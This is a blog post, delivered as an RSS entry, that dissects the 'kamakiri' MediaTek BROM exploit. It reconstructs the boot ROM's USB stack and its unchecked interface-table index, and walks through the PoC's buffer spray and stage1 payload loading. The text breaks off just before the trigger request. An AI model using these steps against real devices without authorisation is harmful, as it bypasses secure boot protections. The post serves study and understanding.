<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>R0rt1z2</title><description>R0rt1z2&apos;s Blog</description><link>https://blog.r0rt1z2.com/</link><language>en</language><item><title>Dissecting a mantis - the kamakiri exploit</title><link>https://blog.r0rt1z2.com/posts/dissecting-a-mantis/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/dissecting-a-mantis/</guid><description>Understanding and explaining the &quot;kamakiri&quot; MediaTek BROM exploit</description><pubDate>Sat, 02 May 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;I&apos;ve known about the &lt;a href=&quot;https://github.com/amonet-kamakiri/kamakiri&quot;&gt;&quot;kamakiri&quot; 🦗 exploit&lt;/a&gt; for a while now, and like many others, I&apos;ve even used it in practice, but I never really stopped to understand how it actually works under the hood.&lt;/p&gt;
&lt;p&gt;There are quite a lot of public MediaTek BROM exploits floating around, but despite their availability, there isn&apos;t much in the way of clear, detailed explanations of how they function internally.&lt;/p&gt;
&lt;p&gt;Because of that, I decided it would be a good idea to sit down and dissect one of them. I chose the original kamakiri exploit since it&apos;s the one I&apos;ve used the most.&lt;/p&gt;
&lt;p&gt;FWIW, this isn&apos;t the beginning of a full write-up series on all the MediaTek exploits; I&apos;m just taking notes so I don&apos;t forget how any of this works later (future-me is notoriously unreliable lol).&lt;/p&gt;
&lt;h1&gt;Background&lt;/h1&gt;
&lt;p&gt;On MediaTek devices, the BROM, under certain circumstances, exposes a VCOM interface that can be used to unbrick the device with the help of a &lt;strong&gt;Download Agent&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Naturally, this interface is typically protected by a set of security measures that prevent arbitrary payload execution or unrestricted memory access.&lt;/p&gt;
&lt;p&gt;Since this has already been covered in the &lt;a href=&quot;https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/#uploading-the-das&quot;&gt;heapbait blog post&lt;/a&gt;, I won&apos;t go into detail here, but the three main mechanisms are &lt;strong&gt;Serial Link Authorization&lt;/strong&gt;, &lt;strong&gt;Download Agent Authentication&lt;/strong&gt;, and &lt;strong&gt;Secure Boot Control&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The reason most of the exploits mentioned earlier were originally developed was to bypass these security measures and achieve arbitrary code execution in the BROM.&lt;/p&gt;
&lt;p&gt;From there, this can be used to unlock the bootloader, unbrick the device, or basically do anything else you want.&lt;/p&gt;
&lt;h1&gt;Origin&lt;/h1&gt;
&lt;p&gt;Before diving into the technical details, it&apos;s worth taking a step back to look at how and why this exploit came to be.&lt;/p&gt;
&lt;p&gt;While it&apos;s unclear how long this vulnerability had been known or exploited privately, the first public mention (and PoC) appeared in 2019, when &lt;a href=&quot;https://github.com/chaosmaster&quot;&gt;k4y0z&lt;/a&gt; and &lt;a href=&quot;https://github.com/xyzz&quot;&gt;xyz`&lt;/a&gt; on XDA &lt;a href=&quot;https://xdaforums.com/t/unlock-root-twrp-unbrick-fire-tv-stick-4k-mantis.3978459/&quot;&gt;released&lt;/a&gt; a method to unlock the bootloader of the Fire TV Stick 4K.&lt;/p&gt;
&lt;p&gt;At the time, the only known BROM exploit was &lt;a href=&quot;https://github.com/xyzz/amonet&quot;&gt;amonet&lt;/a&gt;, which was already a few years old and had been patched on newer devices.&lt;/p&gt;
&lt;p&gt;For those unfamiliar, &quot;kamakiri&quot; is the Japanese word for &quot;mantis&quot;. The exploit takes its name from the device it was first discovered on, the Fire TV Stick 4K, whose codename is &quot;mantis.&quot;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/kamakiri/anatomy-of-a-mantis.png&quot; width=&quot;50%&quot; alt=&quot;Anatomy of a Mantis&quot; /&gt;
  &lt;div style=&quot;font-size:0.8em;color:#777;margin-top:6px&quot;&gt;
    Source: &lt;a href=&quot;https://www.reddit.com/r/Entomology/comments/1s3n9mt/anatomy_of_a_mantis_foreleg/&quot;&gt;u/Halakahiki on Reddit&lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;It&apos;s also worth noting that there are two &quot;variants&quot; of this exploit, though in reality they&apos;re quite different under the hood.&lt;/p&gt;
&lt;p&gt;The most commonly used one is the &quot;v2&quot; (kamakiri2) variant, which came later and is generally easier to work with. &lt;strong&gt;This post will focus on the original one&lt;/strong&gt;.&lt;/p&gt;
&lt;h1&gt;USB Stack&lt;/h1&gt;
&lt;p&gt;To understand the exploit, you first need a rough picture of how the BROM&apos;s USB stack is organized. It&apos;s not complicated, but there are three specific pieces that matter:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The transmit buffer.&lt;/li&gt;
&lt;li&gt;The echo protocol.&lt;/li&gt;
&lt;li&gt;The interface handler table.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each one is nothing special on its own; it&apos;s only when you look at them together that things get interesting.&lt;/p&gt;
&lt;h2&gt;The USB stack layers&lt;/h2&gt;
&lt;p&gt;Before getting into the buffers, it&apos;s worth understanding how the USB stack is organized, because it&apos;s a bit more layered than you might expect.&lt;/p&gt;
&lt;p&gt;At the bottom there&apos;s the raw USB hardware: registers, FIFOs, endpoints. &lt;code&gt;USB_EPFIFOWrite&lt;/code&gt; talks to this level directly, writing bytes into the hardware FIFO one at a time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USB_EPFIFOWrite(uint8_t nEP, uint16_t nBytes, void *pSrc) {
    USB_INDEX = nEP;

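    const uint8_t *p = (const uint8_t *)pSrc;
    // memory-mapped FIFO register of this endpoint; volatile so every store is actually emitted
    volatile uint8_t *fifo = (volatile uint8_t *)(nEP * 4 + 0x11100020);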

    while (nBytes--) {
        *fifo = *p++;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Above that sits the ACM layer. &lt;code&gt;USBDL_PutByte&lt;/code&gt; and its receive counterpart handle the staging buffers and know about packet boundaries:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) {
        USB_EPFIFOWrite(...);
        usbacm_tx_buf.len = 0;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But there&apos;s another layer on top of all of this that&apos;s easy to miss. At some point during initialization, the BROM calls &lt;code&gt;IO_Init&lt;/code&gt;, which sets up a small function pointer table that abstracts over the two supported I/O interfaces, USB and UART:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void IO_Init(IO_INTERFACE vio) {
    if (vio == IO_USB) {
        IO_GetData  = (code *)0x5E99;  // USBDL_GetByte
        IO_PutData  = (code *)0x5EB3;  // USBDL_PutByte (wrapper)
        IO_TX_Flush = (code *)0x7321;  // USBDL_Flush
    } else if (vio == IO_UART) {
        IO_GetData  = (code *)0xD029;  // UART_adpt_GetData
        IO_PutData  = (code *)0xD043;  // UART_adpt_PutData
        IO_TX_Flush = (code *)0xD05D;  // UART_CheckSendComplete
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whichever interface gets selected, the command handlers don&apos;t call &lt;code&gt;USBDL_PutByte&lt;/code&gt; directly.&lt;/p&gt;
&lt;p&gt;Instead, they go through a small serialization layer (&lt;code&gt;IO_PutData32_Ex&lt;/code&gt;, &lt;code&gt;IO_PutData16_Ex&lt;/code&gt;, and &lt;code&gt;IO_PutByte_Ex&lt;/code&gt;), which breaks values down into individual bytes, most significant byte first, and feeds them into &lt;code&gt;IO_PutData&lt;/code&gt; one at a time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void IO_PutData32_Ex(uint32_t data32, bool flush_tx) {
    for (int i = 0; i &amp;lt; 4; i++) {
        uint8_t byte = data32 &amp;gt;&amp;gt; (24 - i * 8);
        (*IO_PutData)(&amp;amp;byte, 1, 0xffffffff);
    }
    if (flush_tx)
        (*IO_TX_Flush)();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This means none of the command handlers need to know which interface is active; they just call &lt;code&gt;IO_PutData32_Ex&lt;/code&gt; and let the function pointer table sort it out. The full picture looks like this:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/kamakiri/usb-stack.png&quot; alt=&quot;USB Stack&quot; /&gt;
&lt;/div&gt;
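&lt;p&gt;The byte order used by &lt;code&gt;IO_PutData32_Ex&lt;/code&gt; is easy to gloss over, so here is a minimal Python sketch of it. The helper name &lt;code&gt;put_data32&lt;/code&gt; is made up for illustration; it only mirrors the shift in the BROM loop, which sends the most significant byte first:&lt;/p&gt;

```python
def put_data32(value):
    """Mimic IO_PutData32_Ex: split a 32-bit value into bytes, MSB first."""
    return bytes((value >> (24 - i * 8)) % 256 for i in range(4))

wire = put_data32(0x000A1000)
print(wire.hex(" "))                        # 00 0a 10 00
print(hex(int.from_bytes(wire, "little")))  # 0x100a00
```

&lt;p&gt;The same four bytes read back as a different number once they are loaded as a little-endian word, which is worth keeping in mind whenever an echoed value is later reinterpreted as a pointer.&lt;/p&gt;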
&lt;h2&gt;The transmit buffer&lt;/h2&gt;
&lt;p&gt;When the BROM needs to communicate with the host, it doesn&apos;t read from or write to the USB hardware directly.&lt;/p&gt;
&lt;p&gt;Instead, it stages data in RAM first. There&apos;s a receive buffer for incoming data and a transmit buffer for outgoing data.&lt;/p&gt;
&lt;p&gt;For the receive buffer, incoming bytes from the host land there and get consumed by whatever command handler is currently running.&lt;/p&gt;
&lt;p&gt;The transmit buffer is a structure called &lt;code&gt;usbacm_tx_buf&lt;/code&gt;, sitting at &lt;code&gt;0x001060E0&lt;/code&gt; (for MT8167):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct {
    uint32_t len;    // 0x001060E0 (how many bytes are currently queued)
    uint8_t  data[]; // 0x001060E4 (the actual bytes)
} usbacm_tx_buf;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;len&lt;/code&gt; is the write cursor: it tracks how many bytes are currently sitting in &lt;code&gt;data[]&lt;/code&gt; waiting to be sent.&lt;/p&gt;
&lt;p&gt;Every outgoing byte goes through &lt;code&gt;USBDL_PutByte&lt;/code&gt;, which appends it to &lt;code&gt;data[]&lt;/code&gt; and bumps &lt;code&gt;len&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) { // 64 on FS, 512 on HS
        USB_EPFIFOWrite(txpipe-&amp;gt;byEP, packet_size, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(txpipe-&amp;gt;byEP);
        usbacm_tx_buf.len = 0;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once &lt;code&gt;len&lt;/code&gt; hits the packet size, the buffer gets flushed to the hardware FIFO and &lt;code&gt;len&lt;/code&gt; resets to zero. The bytes in &lt;code&gt;data[]&lt;/code&gt; don&apos;t get cleared; they just sit there in RAM until something else writes over them.&lt;/p&gt;
&lt;p&gt;There&apos;s also &lt;code&gt;USBDL_Flush()&lt;/code&gt;, which sends whatever&apos;s currently queued without waiting for the buffer to fill up:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USBDL_Flush(void) {
    if (nDevState == DEVSTATE_CONFIG &amp;amp;&amp;amp; usbacm_tx_buf.len != 0) {
        nEP = txpipe-&amp;gt;byEP;
        gUSBAcm_IsInEPComplete = false;
        USB_EPFIFOWrite(nEP, usbacm_tx_buf.len, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(nEP);
        while (!gUSBAcm_IsInEPComplete)
            USB_HISR();
        usbacm_tx_buf.len = 0;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Same result, &lt;code&gt;len&lt;/code&gt; resets to zero, bytes stay in RAM. This &quot;stale bytes&quot; behavior is going to matter a lot later.&lt;/p&gt;
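&lt;p&gt;To make the &quot;stale bytes&quot; behavior concrete, here is a toy Python model of the buffer. The &lt;code&gt;TxBuffer&lt;/code&gt; class and its &lt;code&gt;sent&lt;/code&gt; list are purely illustrative stand-ins for &lt;code&gt;usbacm_tx_buf&lt;/code&gt; and the hardware FIFO, not something taken from the BROM:&lt;/p&gt;

```python
class TxBuffer:
    """Toy model of usbacm_tx_buf: a length cursor plus a backing byte array."""

    def __init__(self, packet_size=64):
        self.packet_size = packet_size
        self.len = 0
        self.data = bytearray(packet_size)
        self.sent = []  # packets handed to the (imaginary) hardware FIFO

    def put_byte(self, value):
        self.data[self.len] = value
        self.len += 1
        if self.len == self.packet_size:
            self._send()

    def flush(self):
        if self.len != 0:
            self._send()

    def _send(self):
        self.sent.append(bytes(self.data[:self.len]))
        self.len = 0  # the cursor rewinds, data[] is left untouched

buf = TxBuffer()
for b in bytes.fromhex("000a1000"):
    buf.put_byte(b)
buf.flush()
print(buf.len, buf.data[:4].hex())  # 0 000a1000
```

&lt;p&gt;After the flush the cursor is back at zero, yet the four bytes are still readable at the start of &lt;code&gt;data&lt;/code&gt;.&lt;/p&gt;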
&lt;h2&gt;BROM command loop&lt;/h2&gt;
&lt;p&gt;The BROM doesn&apos;t always end up in the command loop; this only happens when it boots into USBDL mode. There are a few reasons this can happen.&lt;/p&gt;
&lt;p&gt;The most common ones are a missing or invalid Preloader, a shorted eMMC, or a device that&apos;s simply blank from the factory. Some devices also expose a button combo that forces USBDL mode at boot.&lt;/p&gt;
&lt;p&gt;Whatever the cause, once the BROM decides it&apos;s in USBDL mode, it initializes the USB stack and starts waiting for the host to interact with it.&lt;/p&gt;
&lt;p&gt;The loop reads a command byte and dispatches it to the appropriate handler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void BromCmdLoop(void) {
    BromCmdLoop_Init();
    while (true) {
        uint8_t cmd = IO_GetByte();
        IO_PutByte_Ex(cmd, true); // echo cmd
        switch (cmd) {
        case 0xD1: BromCmd_Read(CMD_LEN_32, false);  break;
        case 0xD4: BromCmd_Write(CMD_LEN_32, true);  break;
        case 0xE0: BromCmd_SendCert();               break;
        case 0xFD: BromCmd_Get_HW_Code();            break;
        // ...
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are quite a few commands, but the ones relevant to this exploit are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0xD1&lt;/code&gt; (&lt;code&gt;BromCmd_Read&lt;/code&gt;): read arbitrary memory and echo it back&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xD4&lt;/code&gt; (&lt;code&gt;BromCmd_Write&lt;/code&gt;): write arbitrary memory&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xE0&lt;/code&gt; (&lt;code&gt;BromCmd_SendCert&lt;/code&gt;): load a blob into memory at a fixed address&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Every one of these handlers echoes its arguments back before doing anything.&lt;/p&gt;
&lt;h2&gt;The interface handler table&lt;/h2&gt;
&lt;p&gt;When the BROM receives a USB control request on endpoint 0, it hands it off to &lt;code&gt;USB_Endpoint0_Idle&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This function is responsible for parsing the request and dispatching it to the appropriate handler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USB_Endpoint0_Idle(void) {
    USB_EPFIFORead(0, 8, &amp;amp;cmd);

    if ((cmd.bmRequestType &amp;amp; USB_CMD_TYPEMASK) == 0) {
        // standard requests
        switch (cmd.bRequest) {
        case 0x05: stall = USB_Cmd_SetAddress(&amp;amp;ep0info, &amp;amp;cmd);    break;
        case 0x06: stall = USB_Cmd_GetDescriptor(&amp;amp;ep0info, &amp;amp;cmd); break;
        case 0x09: stall = USB_Cmd_SetConfiguration(&amp;amp;ep0info, &amp;amp;cmd); break;
        case 0x0b: stall = USB_Cmd_SetInterface(&amp;amp;ep0info, &amp;amp;cmd);  break;
        // ...
        }
        return;
    }

    // class specific requests
    if ((cmd.bmRequestType &amp;amp; 0x60) != 0x20) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if ((cmd.bmRequestType != 0xA1) &amp;amp;&amp;amp; (cmd.bmRequestType != 0x21)) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
        (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
        return;
    }

    USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Standard requests like &lt;code&gt;SetAddress&lt;/code&gt; or &lt;code&gt;GetDescriptor&lt;/code&gt; are handled inline, whereas class-specific requests (identified by &lt;code&gt;bmRequestType&lt;/code&gt; having the class bit set) get dispatched through a different path.&lt;/p&gt;
&lt;p&gt;For those, the BROM looks up the handler in &lt;code&gt;if_info&lt;/code&gt;, a table of interface descriptors sitting at &lt;code&gt;0x00103780&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Each entry is &lt;code&gt;0x34&lt;/code&gt; bytes and contains, among other things, a function pointer at offset &lt;code&gt;+0x04&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Usb_Interface_Info {
    char     *interface_name;          // +0x00
    void     *if_class_specific_hdlr;  // +0x04 (function pointer)
    uint16_t  ifdscr_size;             // +0x08
    // ...
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When a class specific request comes in, the BROM takes &lt;code&gt;cmd.wIndex&lt;/code&gt;, uses it as an index into &lt;code&gt;if_info&lt;/code&gt;, and calls the handler directly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are only three registered interfaces, but the index is never validated: &lt;code&gt;wIndex&lt;/code&gt; is merely truncated to a byte, so nothing stops you from requesting &lt;code&gt;wIndex=200&lt;/code&gt;, or &lt;code&gt;wIndex=204&lt;/code&gt;, or any other value up to 255 that lands outside the legitimate interface entries.&lt;/p&gt;
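&lt;p&gt;To get a feel for how far such an index reaches, here is a rough sketch using the MT8167 addresses quoted in this post. The size of &lt;code&gt;data[]&lt;/code&gt; is not stated anywhere above, so the 64-byte window (one full-speed packet) is an assumption, and &lt;code&gt;handler_slot&lt;/code&gt; is a made-up helper name:&lt;/p&gt;

```python
IF_INFO_BASE = 0x00103780  # base of if_info (MT8167, from this post)
ENTRY_SIZE = 0x34          # size of one Usb_Interface_Info entry
HDLR_OFFSET = 0x04         # offset of if_class_specific_hdlr inside an entry
TX_DATA = 0x001060E4       # usbacm_tx_buf.data (MT8167, from this post)
TX_DATA_SIZE = 64          # assumption: one full-speed packet worth of data[]

def handler_slot(w_index):
    """Address the BROM reads the handler pointer from for a given wIndex."""
    return IF_INFO_BASE + (w_index % 256) * ENTRY_SIZE + HDLR_OFFSET

tx_window = range(TX_DATA, TX_DATA + TX_DATA_SIZE)
hits = [w for w in range(256) if handler_slot(w) in tx_window]
for w in hits:
    print(w, hex(handler_slot(w)), "data offset", handler_slot(w) - TX_DATA)
```

&lt;p&gt;Under those assumptions a single index has its handler pointer inside the transmit buffer; a larger &lt;code&gt;data[]&lt;/code&gt; would simply add a few more candidates after it.&lt;/p&gt;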
&lt;h1&gt;Walking through the PoC&lt;/h1&gt;
&lt;p&gt;Now that we have a somewhat solid understanding of the USB stack, let&apos;s walk through the exploit step by step.&lt;/p&gt;
&lt;p&gt;The PoC we&apos;ll be looking at can be found &lt;a href=&quot;https://github.com/R0rt1z2/kamakiri/blob/kamakiri-mt8167/modules/load_payload.py&quot;&gt;here&lt;/a&gt;. There are probably other versions floating around, but they all do the same thing in the end.&lt;/p&gt;
&lt;h2&gt;Handshake and setup&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;dev.handshake()
dev.write32(0x10007000, 0x22000000)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Before anything else, the host needs to establish communication with the BROM. The handshake is a simple four-byte sequence.&lt;/p&gt;
&lt;p&gt;BROM expects &lt;code&gt;A0 0A 50 05&lt;/code&gt; and responds with the bitwise complement of each byte. Once that&apos;s done, it is ready to accept commands.&lt;/p&gt;
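&lt;p&gt;The expected replies can be worked out by hand, but a couple of lines of Python make it explicit. This is just the arithmetic, not the PoC&apos;s actual &lt;code&gt;handshake()&lt;/code&gt; implementation, and &lt;code&gt;expected_reply&lt;/code&gt; is a hypothetical helper:&lt;/p&gt;

```python
HANDSHAKE = bytes.fromhex("A00A5005")

def expected_reply(sent):
    """Bitwise complement of every byte, as described for the BROM handshake."""
    return bytes(b ^ 0xFF for b in sent)

print(expected_reply(HANDSHAKE).hex(" "))  # 5f f5 af fa
```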
&lt;p&gt;If USBDL mode was entered via a hardware short on the eMMC, the user also needs to release the short at this point before continuing.&lt;/p&gt;
&lt;p&gt;The PoC handles this with a small thread that kicks the watchdog every second while waiting for user input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;thread = UserInputThread()
thread.start()
while not thread.done:
    dev.write32(0x10007008, 0x1971)  # kick watchdog
    time.sleep(1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once the short is released and the thread signals done, execution continues with the rest of the exploit.&lt;/p&gt;
&lt;h2&gt;The TX buffer spray&lt;/h2&gt;
&lt;p&gt;The next thing the PoC does is manipulate the TX buffer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;addr = 0x10007050
dev.write32(addr, [0xA1000])
cnt = 15
for i in range(cnt):
    dev.read32(addr - (cnt - i) * 4, cnt - i + 1)
&lt;/code&gt;&lt;/pre&gt;
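&lt;p&gt;The goal is to get &lt;code&gt;0x000A1000&lt;/code&gt; (the payload address &lt;code&gt;0x00100A00&lt;/code&gt; with its bytes swapped) to land at a specific offset inside &lt;code&gt;usbacm_tx_buf&lt;/code&gt; that corresponds to &lt;code&gt;if_info[wIndex].if_class_specific_hdlr&lt;/code&gt; for the &lt;code&gt;wIndex&lt;/code&gt; we plan to use in the trigger step. Since the BROM echoes each word most significant byte first, the value ends up in the buffer as &lt;code&gt;00 0A 10 00&lt;/code&gt;, which reads back as &lt;code&gt;0x00100A00&lt;/code&gt; when loaded as a little-endian pointer.&lt;/p&gt;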
&lt;p&gt;&lt;code&gt;WDT_BASE + 0x50&lt;/code&gt; is used as the scratch address because it falls inside the watchdog register region, one of the memory regions the BROM allows you to access freely.&lt;/p&gt;
&lt;p&gt;What the register itself does doesn&apos;t really matter, what matters is that it&apos;s accessible without triggering any access violations.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;write32(addr, [0xA1000])&lt;/code&gt; plants &lt;code&gt;0x000A1000&lt;/code&gt; there. From that point, the loop issues a series of reads whose starting address moves forward one word at a time while the word count shrinks, so that every read ends on &lt;code&gt;addr&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Each iteration starts one word closer to &lt;code&gt;addr&lt;/code&gt; and reads one word fewer than the last:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;i=0:  read32(addr - 60, 16)
i=1:  read32(addr - 56, 15)
...
i=14: read32(addr - 4,  2) (last word = addr = 0x000A1000)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Every one of those reads echoes its data back through &lt;code&gt;USBDL_PutByte&lt;/code&gt;, accumulating in the TX buffer. The exact offsets depend on the memory layout of the specific BROM.&lt;/p&gt;
&lt;p&gt;Either way, the end result is the same: the echoed bytes of &lt;code&gt;0x000A1000&lt;/code&gt; end up sitting at the right offset inside &lt;code&gt;usbacm_tx_buf&lt;/code&gt; to overlap with &lt;code&gt;if_info[wIndex].if_class_specific_hdlr&lt;/code&gt;.&lt;/p&gt;
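&lt;p&gt;The read pattern is easier to see when enumerated. A small sketch, reusing the constants from the PoC snippet; &lt;code&gt;spray_reads&lt;/code&gt; is a hypothetical helper and not part of the PoC:&lt;/p&gt;

```python
ADDR = 0x10007050  # scratch register used by the PoC
CNT = 15           # number of reads issued by the loop

def spray_reads(addr=ADDR, cnt=CNT):
    """Return (start_address, word_count) for every read32 the loop issues."""
    return [(addr - (cnt - i) * 4, cnt - i + 1) for i in range(cnt)]

for start, words in spray_reads():
    last_word = start + (words - 1) * 4  # address of the final word in this read
    print(hex(start), words, hex(last_word))
```

&lt;p&gt;The last column is identical on every line, which is the point: whatever else gets echoed along the way, each read finishes with the planted word.&lt;/p&gt;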
&lt;h2&gt;Loading the payload&lt;/h2&gt;
&lt;p&gt;For the exploit to work, there has to be a way to upload arbitrary code into memory. Thankfully, &lt;code&gt;BromCmd_SendCert&lt;/code&gt; (&lt;code&gt;0xE0&lt;/code&gt;) does exactly that.&lt;/p&gt;
&lt;p&gt;It was probably designed to receive a certificate blob from the host and load it into memory at &lt;code&gt;0x100A00&lt;/code&gt; for verification.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def attempt2(d):
    d.write(b&quot;\xE0&quot;)
    result = d.read(1)
    d.write(p32(0xA00))
    result = d.read(4)
    payload = load_payload_file(&quot;../brom-payload/stage1/stage1.bin&quot;)
    d.write(payload)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The host sends &lt;code&gt;0xA00&lt;/code&gt; as the length, the BROM echoes it back, then reads that many bytes into &lt;code&gt;0x100A00&lt;/code&gt;. On the BROM side:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uint32_t BromCmd_SendCert(void) {
    uint32_t len = IO_GetData32();
    IO_PutData32_Ex(len, true);

    if (!bExecOnce) {
        bExecOnce = true;
        if (Secure_SCTRL_CERT_IsValidRange(len) &amp;lt; 0xff) {
            IO_PutData16_Ex(status, true);
            IO_GetDataBlock8(0x100A00, len, 5);  // payload lands here
            Secure_SCTRL_CERT_Verify(0x100A00);  // fails, but doesn&apos;t clean up
        }
    }

    IO_PutData16_Ex(status, true);
    return status;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The detail here is that the data gets written to memory &lt;em&gt;before&lt;/em&gt; verification runs. The cert check will fail since we&apos;re not sending anything valid, but BROM never cleans up the memory afterwards.&lt;/p&gt;
&lt;p&gt;The only real constraint is size: the payload must fit within &lt;code&gt;0xA00&lt;/code&gt; bytes, which is solved by using a two-stage approach.&lt;/p&gt;
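&lt;p&gt;Because the BROM reads exactly as many bytes as the announced length, the host has to send a full &lt;code&gt;0xA00&lt;/code&gt; bytes even when stage1 is smaller. Here is a hedged sketch of what the host-side framing could look like. &lt;code&gt;build_send_cert&lt;/code&gt; is a hypothetical helper, and both the zero padding and the big-endian length (chosen to mirror how the BROM serializes words) are assumptions rather than something confirmed by the PoC:&lt;/p&gt;

```python
MAX_CERT_LEN = 0xA00  # length the PoC announces with the 0xE0 command

def build_send_cert(payload, length=MAX_CERT_LEN):
    """Return the byte strings the host writes: command, length, padded payload."""
    if len(payload) > length:
        raise ValueError("stage1 payload does not fit in the SendCert buffer")
    padded = payload + bytes(length - len(payload))    # zero padding is an assumption
    return b"\xE0", length.to_bytes(4, "big"), padded  # big-endian length is an assumption

cmd, announced, body = build_send_cert(b"\x01\x02\x03\x04")
print(cmd.hex(), announced.hex(), len(body))
```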
&lt;h2&gt;Pulling the trigger&lt;/h2&gt;
&lt;p&gt;At this point the two pieces are in place: the payload is sitting at &lt;code&gt;0x100A00&lt;/code&gt; and &lt;code&gt;usbacm_tx_buf&lt;/code&gt; has been sprayed with the echoed bytes of &lt;code&gt;0x000A1000&lt;/code&gt; at the right offset. All that&apos;s left is to trigger the jump.&lt;/p&gt;
&lt;p&gt;To confirm this, here&apos;s a hexdump of &lt;code&gt;usbacm_tx_buf&lt;/code&gt; taken from inside the stage1 payload immediately after it starts running:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;001060E0  00 00 00 00 A1 A2 A3 A4  00 0A 10 00 00 0A 10 00  |................|
001060F0  00 0A 10 00 00 0A 10 00  00 0A 10 00 00 0A 10 00  |................|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;len&lt;/code&gt; is zero (the buffer was flushed), and the bytes &lt;code&gt;00 0A 10 00&lt;/code&gt; repeat throughout &lt;code&gt;data[]&lt;/code&gt;. The word at &lt;code&gt;data[16]&lt;/code&gt; (address &lt;code&gt;0x1060F4&lt;/code&gt;) is the one that matters; that&apos;s where &lt;code&gt;if_info[204].if_class_specific_hdlr&lt;/code&gt; lives:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; hex(0x00103780 + 204 * 0x34 + 4)
&apos;0x1060F4&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;0x00103780&lt;/code&gt; is the base address of &lt;code&gt;if_info&lt;/code&gt;, &lt;code&gt;0x34&lt;/code&gt; is the size of each entry, &lt;code&gt;204&lt;/code&gt; is the index, and &lt;code&gt;+4&lt;/code&gt; is the offset of &lt;code&gt;if_class_specific_hdlr&lt;/code&gt; within the entry.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/kamakiri/tx-buf-overlap.png&quot; alt=&quot;TX Buffer Overlap&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The result lands exactly at &lt;code&gt;0x1060F4&lt;/code&gt;, inside &lt;code&gt;usbacm_tx_buf.data[]&lt;/code&gt;. The trigger is a USB control request:&lt;/p&gt;
